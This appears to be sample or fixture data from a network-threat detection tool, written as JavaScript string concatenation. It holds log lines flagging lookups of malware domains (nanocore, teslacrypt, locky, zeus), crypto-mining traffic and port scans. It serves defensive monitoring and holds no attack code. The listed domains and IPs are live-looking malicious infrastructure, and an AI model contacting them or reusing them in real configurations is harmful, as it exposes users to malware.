    '"2021-01-11 04:01:43.384494" r2d2 2.200.110.232 63956 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:01:43.386092" r2d2 2.200.107.146 27291 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:01:48.857096" r2d2 10.43.192.103 59329 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:01:50.690719" r2d2 178.17.174.14 37448 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; MSN Optimized;US; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; BRI/2; BO1IE8_v1;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:01:54.903619" r2d2 10.43.192.103 59330 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:02:19.029424" r2d2 10.43.192.103 59356 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:02:22.881962" r2d2 10.1.81.47 58512 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 04:02:22.881968" r2d2 10.1.81.47 58512 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 04:02:25.074247" r2d2 10.43.192.103 59367 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:02:31.099471" r2d2 10.43.192.103 59377 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:02:32.703831" r2d2 2.200.110.232 64611 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:02:32.730284" r2d2 2.200.110.233 49322 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:02:37.275883" r2d2 2.200.110.232 64123 2.200.107.168 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:02:43.173308" r2d2 10.43.192.103 59392 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:02:59.607108" r2d2 2.200.110.232 64187 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:02:55.208002" r2d2 178.17.174.14 59610 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C; BO2IE8_v1;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:03:01.292553" r2d2 10.43.192.103 59395 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:02.381475" r2d2 2.200.105.226 59955 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:02.381466" r2d2 2.200.105.226 59955 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:02.381478" r2d2 2.200.105.226 59955 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:02.411979" r2d2 2.200.105.226 59638 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:02.412071" r2d2 2.200.105.226 59638 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:07.322969" r2d2 10.43.192.103 59398 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:19.410367" r2d2 10.43.192.103 59400 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:31.000088" r2d2 2.200.108.59 12822,12824,12826,12827,12829,12830,12832,12835,12837,12838,12839,12844,12846,12850,12851,12853,12861,12862,12866,32976,34520,34566,35584,36688,37210,37648,38416,38784,39374,41276,41326,41584,42358,42864,42979,42982,42983,42984,42988,44066,45708,45910,45990,46518,46788,47072,47748,48997,48998,49005,51682,51690,51840,52284,52324,52352,52366,52390,52556,53078,53152,53558,53912,53956,54022,54362,54654,54954,55864,56482,56866,57254,58158,58280,59128,59470,59776,60534,60818 77.53.81.105 21,5102,5229,5770,5908,8937,9134,14070,17393,17468,17534,18449,18832,19464,19697,20782,21612,24028,24271,24531,28725,30528,32615,32671,33601,33700,33853,34963,35558,35652,35967,36099,37122,37703,39290,40559,42978,43202,45942,48578,49343,50758,51214,51977,52792,53068,54069,54148,55208,58201,61839,62098,64721 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:03:37.532170" r2d2 10.43.192.103 59403 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:31.000082" r2d2 2.200.108.59 12816,12818,12819,12821,12822,12823,12824,12837,12840,12841,12842,12843,12845,12847,12848,12849,12852,12854,12855,12856,12858,12859,12860,12862,12864,12867,12869,12872,12876,12878,12880,12881,12882,12885,12888,12889,12891,12892,12896,12897,12898,12899,12900,12901,12902,12903,12906,12907,12908,12912,12915,12918,12920,12922,12925,12926,12929,12931,12932,12934,12935,12937,12938,32966,33260,33280,33394,33408,33610,33634,33664,34068,34564,34654,34836,34860,35152,35472,35616,35816,35906,36610,36682,36890,37264,37516,37618,38024,38348,38416,38530,38610,38852,39500,40086,40108,40294,40550,40648,40694,40844,41148,41374,41462,41502,41592,41630,41930,42314,42338,42358,42614,42864,42978,42980,42985,42986,42987,42988,42989,42991,42994,42995,43001,43002,43003,43004,43007,43010,43118,43212,43224,43288,43504,43882,44550,45124,45478,45708,45910,46102,46798,47062,47270,47474,47578,47706,47796,47862,48058,48264,48280,48380,48996,48999,49000,49001,49002,49004,49007,49009,49010,49011,49013,49015,49016,49018,49244,49404,49776,49974,50118,50248,50348,50360,50672,51156,51352,51518,51584,51892,52296,52352,52366,52390,52814,52906,53134,53152,53310,53340,53362,53912,54362,54376,54650,54926,54954,55286,55334,55508,56024,56482,57032,57258,57594,57648,57840,58062,58070,58158,58172,58214,58446,59042,59136,59152,59486,59574,59610,60608,60760,60818,60858,60980 77.53.81.105 21,5770,6972,7905,8310,10237,10851,10978,11119,11271,13534,14154,14236,14745,14863,15695,15806,15890,15946,16098,16984,17086,17106,17110,17393,18449,18698,19230,20542,21491,21612,22729,23722,23728,24082,24271,24697,25024,25697,25698,25869,26048,26421,26934,27193,27867,28578,28601,28702,28818,28840,28936,29374,30042,30566,31010,31245,32635,32671,33395,33748,34880,34946,35148,35558,35652,35816,36099,36308,37064,37122,37703,37980,38408,39337,40226,41787,41812,42292,42365,42744,43354,43534,43621,43784,44459,44959,45708,45942,45963,46087,46119,47209,47698,48180,48247,48250,48311,48735,49002,49485,50034,50046,51173,51326,52792,53036,53068,54039,54148,54307,54383,54517,55366,55970,56392,56600,56895,57518,57991,59388,60166,60637,60971,61141,62025,62124,62514,62832,63087,64153,64517,65475 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:03:36.801031" r2d2 178.17.174.14 39310 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; Creative ZENcast v1.02.10; .NET4.0C; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:03:31.000095" r2d2 2.200.108.59 12816,12817,12819,12820,12821,12825,12827,12828,12829,12830,12831,12832,12833,12834,12835,12836,12838,12840,12843,12845,12846,12848,12851,12853,12854,12856,12857,12859,12861,12863,12864,12865,12867,12871,12873,12878,12884,12890,12891,12893,12894,12895,12896,12901,12902,12904,12905,12910,12912,12915,12918,12923,12925,12927,12928,12929,12930,12936,12937,12938,32976,33260,33408,33498,33522,33552,33664,33848,34068,34520,34524,34554,34564,34566,34840,35330,35528,35584,35616,35906,36794,36966,37120,37366,37370,37648,37668,38168,38240,39374,39570,39914,40026,40074,40086,40294,40320,40348,40550,40694,40844,41148,41276,41444,41462,41584,41592,42180,42374,42616,42978,42980,42981,42983,42985,42986,42990,42991,42996,42997,42999,43000,43001,43002,43004,43008,43011,43212,43224,43420,43504,43870,45282,45472,45478,45720,45990,46034,46058,46518,46764,46788,46798,46862,47062,47072,47200,47268,47270,47474,47674,47748,48280,48290,48380,48456,48870,48996,48999,49001,49002,49003,49004,49006,49007,49010,49017,49020,49021,49060,49584,50348,50672,51322,51342,51606,51682,51910,52284,52814,53956,54022,54062,54650,54654,54926,55352,55864,56024,56676,56690,56698,56886,57072,57116,57258,57298,57338,57384,57594,57648,57840,57984,58062,58070,58222,58280,58446,58724,58746,59152,59398,59462,59470,59574,59776,59950,60184,60200,60352,60534,60608,60670,60760,60788,60858,60940,60980 77.53.81.105 21,5025,5102,5751,6079,6205,7803,8937,9134,10978,11095,11119,11675,12943,13272,14070,14745,15353,15806,15946,16416,17086,17534,17547,18622,18832,19112,19248,19464,19587,19654,20542,21491,21804,22729,23549,23581,23722,23728,24028,24309,24964,25088,25171,25698,25845,25869,26048,26421,26880,27193,27247,28072,28084,28175,28193,28578,28601,28664,29607,30528,30566,30883,31010,32119,32615,32635,32707,33201,33700,33725,33853,34963,35148,35967,36088,36308,37713,37985,39061,39270,39337,39856,39862,40226,40970,41787,42365,42978,43354,43437,43621,44158,44958,45059,45381,45708,45710,45950,46330,46483,47209,47333,47398,47698,48034,48247,48578,49002,49343,49485,49538,50034,50379,50464,50758,51214,51573,51706,51810,53350,55142,55208,55366,57518,58201,59388,60637,61141,62098,62361,62461,62662,63468,63987,64153,64325,64517,64721,65396,65475 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:03:36.317486" r2d2 10.44.70.211 51885 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:03:42.735625" r2d2 2.200.107.146 46694 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:03:42.734189" r2d2 2.200.110.232 63390 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:03:42.764755" r2d2 2.200.110.233 63270 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:03:33.000498" r2d2 2.200.108.59 12868,12869,12872,12875,12880,12883,12885,12888,12893,12894,12899,12904,12907,12910,12911,12914,12916,12919,12920,12921,12923,12924,12930,12932,12935,32904,33394,33438,33552,33610,33634,34654,34840,35152,35330,37120,37264,38024,38418,38530,38534,38610,39372,39500,39570,39746,39956,40320,40648,41444,42314,42374,42992,42994,42996,42998,42999,43005,43006,43007,43008,43009,43010,43011,44936,45282,45472,46102,46346,46862,47154,47200,47534,47674,48058,48290,48730,48850,49009,49014,49015,49017,49020,49060,49584,49776,50118,50690,51230,51352,51518,51542,51584,51606,51764,51910,52772,52906,53166,53362,54062,55286,55344,56242,56676,56886,57032,57116,57828,57926,57940,58214,58222,59398,59462,59738,59974,60352,60670,60754,60940 77.53.81.105 21,5025,7803,7848,9595,9979,10237,11271,13028,13272,14154,14863,15562,16098,16416,17219,17569,17833,18172,18622,18698,19112,19587,19654,21804,24082,24309,24964,24993,25088,25300,27247,28664,28818,28840,30883,32119,33193,33201,35017,35065,37713,37980,39270,39856,41812,44959,45360,45381,46087,46300,46483,48034,48250,48311,50046,50160,50301,50379,50464,51173,51326,51573,53326,54517,54567,55142,55153,56392,57991,58024,59305,59740,60166,62025,62124,63666,63987,64003,64218,64464 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:03:36.425094" r2d2 10.44.70.211 51886 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:03:49.599376" r2d2 10.43.192.103 59405 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:03:53.701804" r2d2 2.200.110.233 63886 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 04:03:55.630433" r2d2 10.43.192.103 59406 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:04:02.576329" r2d2 2.200.110.232 64604 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:04:02.625506" r2d2 2.200.110.233 63763 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:04:05.402376" r2d2 2.200.106.188 55999 8.8.8.8 53 UDP DNS (507.gdxox).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 04:04:08.485811" r2d2 178.17.174.14 50858 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS5722; GTB7.3; InfoPath.1; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:04:13.722738" r2d2 10.43.192.103 59414 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:04:15.022047" r2d2 2.200.110.232 64094 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 04:04:15.023768" r2d2 2.200.107.146 5836 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 04:04:24.836670" r2d2 10.43.192.103 59416 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:04:42.923226" r2d2 10.43.192.103 59422 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:04:43.385376" r2d2 2.200.110.232 63944 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:04:43.387314" r2d2 2.200.107.146 47216 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:04:43.401513" r2d2 2.200.110.232 64381 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:04:43.403313" r2d2 2.200.107.146 37117 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:04:40.298713" r2d2 10.1.19.42 59653 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:04:52.767840" r2d2 2.200.110.233 65089 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:04:54.997540" r2d2 10.43.192.103 59424 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:05:04.316599" r2d2 2.200.110.232 63449 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 04:05:04.318065" r2d2 2.200.107.146 54396 185.104.28.19 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 04:05:13.097571" r2d2 10.43.192.103 59430 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:05:25.155368" r2d2 10.43.192.103 59432 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:05:25.469521" r2d2 2.200.107.146 11346 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 04:05:25.467979" r2d2 2.200.110.232 65272 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 04:05:43.230735" r2d2 10.43.192.103 59435 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:05:55.275439" r2d2 10.43.192.103 59437 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:05:59.609860" r2d2 2.200.110.232 64813 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:05:59.627423" r2d2 2.200.107.146 37417 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:05:59.625806" r2d2 2.200.110.232 64051 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:06:01.292806" r2d2 10.43.192.103 59438 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:06:02.769266" r2d2 2.200.110.233 63610 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:06:01.699684" r2d2 10.1.19.42 59654 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:06:13.346814" r2d2 10.43.192.103 59443 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:06:25.364742" r2d2 10.43.192.103 59445 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:06:31.418362" r2d2 10.43.192.103 59446 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:06:43.480099" r2d2 10.43.192.103 59448 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:07:01.581865" r2d2 10.43.192.103 59451 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:07:08.649806" r2d2 2.200.110.232 64001 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:07:08.700924" r2d2 2.200.110.233 64356 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:07:12.773066" r2d2 2.200.110.232 63637 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:07:12.774506" r2d2 2.200.107.146 33381 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:07:12.807462" r2d2 2.200.110.233 65290 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:07:13.665385" r2d2 10.43.192.103 59453 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:07:19.700088" r2d2 10.43.192.103 59454 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:07:31.748288" r2d2 10.43.192.103 59456 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:07:43.382487" r2d2 2.200.110.232 65404 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:07:48.623230" r2d2 2.200.97.1 52493 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:07:49.849304" r2d2 10.43.192.103 59459 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:01.899829" r2d2 10.43.192.103 59461 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:07.949391" r2d2 10.43.192.103 59462 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:18.434210" r2d2 2.200.107.146 54644 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:08:18.432917" r2d2 2.200.110.233 64564 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:08:18.646303" r2d2 2.200.110.233 64885 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 04:08:20.018355" r2d2 10.43.192.103 59464 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:20.979008" r2d2 2.200.110.233 64220 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 04:08:22.812341" r2d2 2.200.110.232 63461 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:08:22.850967" r2d2 2.200.110.233 63303 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:08:34.533499" r2d2 2.200.105.226 58742 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:34.533511" r2d2 2.200.105.226 58742 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:34.533520" r2d2 2.200.105.226 58742 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:38.136702" r2d2 10.43.192.103 59467 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:50.185457" r2d2 10.43.192.103 59469 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:50.673318" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:50.769620" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:51.069409" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:51.772280" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:52.269582" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:52.870551" r2d2 10.3.160.42 27223 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:08:56.205004" r2d2 10.43.192.103 59470 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:08:59.615309" r2d2 2.200.110.232 49227 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:09:08.000005" r2d2 36.133.35.240 33270,34548,37192,40724,42408,54632,55546,57016,57124,57790,58266,59284 2.200.97.216 22,443,2002,2022,2223,2323,4118,5555,6000,9090,22222,50000 TCP IP 36.133.35.240 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:09:14.309497" r2d2 10.43.192.103 59475 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:09:26.377644" r2d2 10.43.192.103 59477 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:09:27.964629" r2d2 2.200.110.232 63777 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:09:27.966317" r2d2 2.200.107.146 15405 192.12.94.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:09:27.999460" r2d2 2.200.110.233 65218 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:09:28.388439" r2d2 2.200.110.233 64119 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:09:28.390174" r2d2 2.200.107.146 40375 97.74.100.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:09:29.570497" r2d2 2.200.110.233 65351 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 04:09:31.442715" r2d2 10.43.192.103 59478 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:09:32.864864" r2d2 2.200.110.232 65048 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:09:32.892674" r2d2 2.200.110.233 65358 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:09:40.347126" r2d2 2.200.110.233 64878 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:09:43.382699" r2d2 2.200.110.232 49237 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 04:09:43.385726" r2d2 2.200.107.146 55627 199.19.54.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 04:09:43.509427" r2d2 10.43.192.103 59480 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:09:46.070182" r2d2 10.1.19.42 59656 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:10:01.616439" r2d2 10.43.192.103 59483 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:10:13.696020" r2d2 10.43.192.103 59485 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:10:19.741450" r2d2 10.43.192.103 59486 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:10:31.800577" r2d2 10.43.192.103 59488 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:10:38.786288" r2d2 2.200.110.232 63512 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:10:38.788131" r2d2 2.200.107.146 26383 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:10:38.819301" r2d2 2.200.110.233 64073 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:10:41.009980" r2d2 2.200.110.233 64976 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 04:10:41.011937" r2d2 2.200.107.146 43783 200.7.5.14 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 04:10:42.897133" r2d2 2.200.110.232 64453 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
